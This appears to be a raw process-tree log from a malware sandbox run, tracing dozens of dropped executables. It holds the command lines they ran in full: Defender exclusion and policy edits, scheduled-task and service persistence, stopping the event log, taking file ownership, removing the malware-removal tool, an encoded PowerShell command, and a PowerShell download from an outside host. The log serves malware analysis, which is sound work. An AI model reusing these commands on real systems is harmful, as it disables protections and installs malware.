C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe\" it /LKCdidakqp 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵
-
C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe"C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 7044⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\example.exe"C:\Users\Admin\AppData\Local\Temp\a\example.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\win-test.exe"C:\Users\Admin\AppData\Local\Temp\a\win-test.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\backdoor.exe"C:\Users\Admin\AppData\Local\Temp\a\backdoor.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\asdf.exe"C:\Users\Admin\AppData\Local\Temp\a\asdf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe"C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 7044⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe"C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Bypass3_Pure_Mode.exe"C:\Users\Admin\AppData\Local\Temp\a\Bypass3_Pure_Mode.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\example.exe"C:\Users\Admin\example.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\example.exe" MD5 | find /i /v "md5" | find /i /v "certutil"5⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\example.exe" MD56⤵
-
C:\Windows\system32\find.exefind /i /v "md5"6⤵
-
C:\Windows\system32\find.exefind /i /v "certutil"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"5⤵
-
C:\Users\Admin\XClient.exe"C:\Users\Admin\XClient.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\csrss.exe'5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe"C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SHKC2.tmp\SrbijaSetupHokej.tmp"C:\Users\Admin\AppData\Local\Temp\is-SHKC2.tmp\SrbijaSetupHokej.tmp" /SL5="$70256,3939740,937984,C:\Users\Admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdateTaskMachineQCW.exe"C:\Users\Admin\AppData\Local\Temp\a\GoogleUpdateTaskMachineQCW.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQCW"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQCW" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQCW"4⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe"C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\ngown.exe"C:\Users\Admin\AppData\Local\Temp\a\ngown.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\ngown.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"C:\Users\Admin\AppData\Local\Temp\a\gHIvTf22qvmZjum.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJJJKFIIIJJJ" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"3⤵
- Drops startup file
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\crt.exe"C:\Users\Admin\AppData\Local\Temp\a\crt.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BTJEF.tmp\crt.tmp"C:\Users\Admin\AppData\Local\Temp\is-BTJEF.tmp\crt.tmp" /SL5="$70292,4508472,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe"C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe" -i5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe"C:\Users\Admin\AppData\Local\Submore Media Player\submoremediaplayer32.exe" -s5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exesc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own5⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "4⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"3⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p563741341569714296105326100 -oextracted5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Loads dropped DLL
-
C:\Windows\system32\attrib.exeattrib +H "svcshost.exe"5⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe"svcshost.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHUAVABIAFUAWgBNAFMATQBIAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAxAHcAMgBDACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAeABNAGEAYwBvAGgAMwBoAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBPADcARAA3AEEAWQBTACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAVABIAFUAWgBNAFMATQBIAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwAxAHcAMgBDACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAeABNAGEAYwBvAGgAMwBoAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBPADcARAA3AEEAWQBTACMAPgA="7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3832" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3832" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\katA5E1.tmpC:\Users\Admin\AppData\Local\Temp\katA5E1.tmp4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\katAC98.tmpC:\Users\Admin\AppData\Local\Temp\katAC98.tmp4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsoADE2.tmp\abc.bat"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"3⤵
-
C:\Windows\sysblardsv.exeC:\Windows\sysblardsv.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\545918409.exeC:\Users\Admin\AppData\Local\Temp\545918409.exe5⤵
-
C:\Windows\syslmgrsvc.exeC:\Windows\syslmgrsvc.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\2869931055.exeC:\Users\Admin\AppData\Local\Temp\2869931055.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\a\print.exe"C:\Users\Admin\AppData\Local\Temp\a\print.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\222.exe"C:\Users\Admin\AppData\Local\Temp\a\222.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p209313910271864811381312692 -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"5⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"5⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OARKQOLE"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OARKQOLE"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\reg.exeC:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName6⤵
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Innovations\PoseidonSense.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url" & exit2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\jsc.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\jsc.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3052 -ip 30521⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3912,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:81⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4948 -ip 49481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2676 -ip 26761⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4144,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3952,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:11⤵
-
